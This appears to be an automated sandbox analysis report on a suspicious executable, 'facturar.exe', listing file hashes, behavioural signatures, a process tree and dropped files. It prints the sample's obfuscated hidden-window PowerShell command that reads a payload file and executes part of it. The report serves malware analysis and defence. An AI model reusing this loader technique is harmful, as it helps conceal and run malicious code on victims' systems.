Analysis

  • max time kernel
    94s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/02/2025, 11:49

General

  • Target
    facturar.exe
  • Size
    781KB
  • MD5
    dc6405171400ba31490159b7e59eae0b
  • SHA1
    59ac7ab360bda219ab6aa5b8b57fd5d3a1f7ec73
  • SHA256
    8e533c355130e312b4bdecd237c49d50cf8d12c5f88fbe991ecaac462f84c9a6
  • SHA512
    15944b966bad130dece39b2b958073b5c63806f8f8441e193af481c2349bd896d2f599bc9dc82ca4a5233802d225245ea5e1b459a6c9033485189be7a7a7ba08
  • SSDEEP
    12288:2tlyuHaQfKrVOnQlp6UV/ytzlI/Xr+urZTbq9pK0R6iyNc3pipkyfGSN:AbQknM6UJylurZTG9pK+65c5yfFN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\facturar.exe
    "C:\Users\Admin\AppData\Local\Temp\facturar.exe"
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Juletrslyset=Get-Content -Raw 'C:\Users\Admin\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\dydsmnstres.Akk';$sjalsmnsterets=$Juletrslyset.SubString(5587,3);.$sjalsmnsterets($Juletrslyset) "
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2368

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\vitrifacture.txt
    Filesize
    6KB
    MD5
    9361066f2eab82730a5f698f735ecf25
    SHA1
    7279f63469efc0aaf9fcf70d8accd623f7d5ac6b
    SHA256
    4976ee2c2c27f507b578f55c6323533dee7b47e25877f8f51398ad34545497d0
    SHA512
    f706fb6dbd5596631ae35a2f6b8fd0d723bd46e6f646383245c470f57c2b3cee2a82f4695e24d9e0a2f7382156eaad4ae218443069c962b247015ec8429583ee

  • memory/2368-18-0x0000000073F21000-0x0000000073F22000-memory.dmp
    Filesize
    4KB
  • memory/2368-20-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize
    5.7MB
  • memory/2368-19-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize
    5.7MB
  • memory/2368-21-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize
    5.7MB
  • memory/2368-22-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize
    5.7MB
  • memory/2368-23-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize
    5.7MB